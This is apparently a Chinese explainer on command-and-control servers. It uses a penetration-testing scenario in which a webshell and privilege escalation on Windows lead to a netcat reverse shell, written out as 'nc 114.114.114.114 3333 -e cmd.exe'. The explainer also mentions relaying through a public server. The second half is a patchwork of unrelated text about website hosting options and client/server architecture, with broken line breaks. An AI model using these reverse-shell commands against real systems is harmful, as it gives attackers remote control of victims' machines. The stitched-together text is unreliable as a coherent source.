什么是C&C服务器

C&C 服务器的全称是 Command and Control Server，翻译过来就是命令和控制服务器

通常在做渗透测试的时候，在拿到一个 webshell 的时候，需要对服务器进行提权操作，如果是一台 windows 的服务器，提权的时候通常是利用本地提权漏洞的 exp 进行溢出提权，有些 exp 可以直接在后面加参数，溢出成功之后执行参数中的命令。

而有的 exp 溢出成功之后是返回一个 system 权限的 cmd，这时就需要将低权限的 cmd shell 反弹回本地，这里用 nc 在本地执行：nc -vv -lp 3333

上述命令的意思是在本地监听一个 3333 端口等待连接，假设电脑 IP 是公网的，并且 IP 为 114.114.114.114，然后在目标服务器就可以执行：nc 114.114.114.114 3333 -e cmd.exe

上面的命令就可以把远程服务器的服务器权限的 cmd shell 返回到本地，这时你就可以通过 nc 建立的这个 shell 进行通信，发送你要执行的命令，在远程服务器接收到命令之后执行并将结果返回，这时本机电脑就是一个简易的 C&C 服务器。

扩展资料：

C&C 服务器使目标机器可以接收来自服务器的命令，从而达到服务器控制目标机器的目的。该方法常用于病毒木马控制被感染的机器。

通常只有这样内网的服务器才可以访问进行连接，所以可以使用一台中转服务器，这台中转服务器有一个公网 IP 地址是：111.111.111.111，这样不管是目标服务器还是我们本机都可以访问这台中转服务器。

这里中转服务器的作用就是本地内网的主机监听的端口映射到公网 IP 的某个端口，这样目标机访问中转服务器监听的端口就相当于访问了我们本地监听的端口。

1。本地管理：你自己拥有服务器，广域网接口，已经申请了域名。这种情况成本最高，维护最麻烦。但是好处是更新速度快（可在本地直接完成），网络带宽稳定。

2。服务器托管：你自己拥有服务器，已经申请了域名。这种情况的成本较上一种的低，维护相对简单，只要将更新的资料随时上传即可。但是更新速度较慢（需要通过网络登陆到服务器上传），网络带宽可能不太稳定。

3。完全托管：你只拥有域名。这种情况成本最底，维护相对简单。但是网站的更新较慢，服务器的使用情况不明，性能没有保障（网络公司一般会让几可网站共用一个服务器），访问带宽完全没有保障。

C/S结构，即Client/Server(客户机/服务器)结构，是大家熟知的软件系统体系结构，通过将任务合理分配到Client端和Server端，降低了系统的通讯开销，可以充分利用两端硬件环境的优势。Server是服务器瑞，client是客户端。

客户端是面向用户的，用户通过客户端提交各种请求（软件功能范围内的）。

服务器端处理客户请求并作出回应。Client就是中文中的客户,用户,使

用者,而Server就是和client相对应的东西,Client和Server之间的关系是一种服务的提供方,和服务

的使用方之间的关系,这种关系是生活中普遍存在的关系.例如,我们去银行取钱,我们就是银行的Cli

ent,而银行作为一个整体是我们的Server.为我们提供服务的是银行的一套系统,而不仅仅是某一个

具体的工作人员.这种关系,就是Client和Server之间的关系.Client/Server就是利用这种关系作为

基础而构成的系统.

在客户机/服务器网络中，服务器是网络的核心，而客户机是网络的基础，客户机依靠服务器获得所需要的网络资源，而服务器为客户机提供网络必须的资源。

它是软件系统体系结构，通过它可以充分利用两端硬件环境的优势，将任务合理分配到

Client端和Server端来实现，降低了系统的通讯开销。目前大多数应用软件系统都是Client/Server形式的两层结构，由于现在的软件应用系统正在向分布式的Web应用发展，Web和Client/Server

应用都可以进行同样的业务处理，应用不同的模块共享逻辑组件；因此，内部的和外部的用户都可以访问新的和现有的应用系统，通过现有应用系统中的逻辑可以扩展出新的应用系统。这也就是目前应用系统的发展方向。

---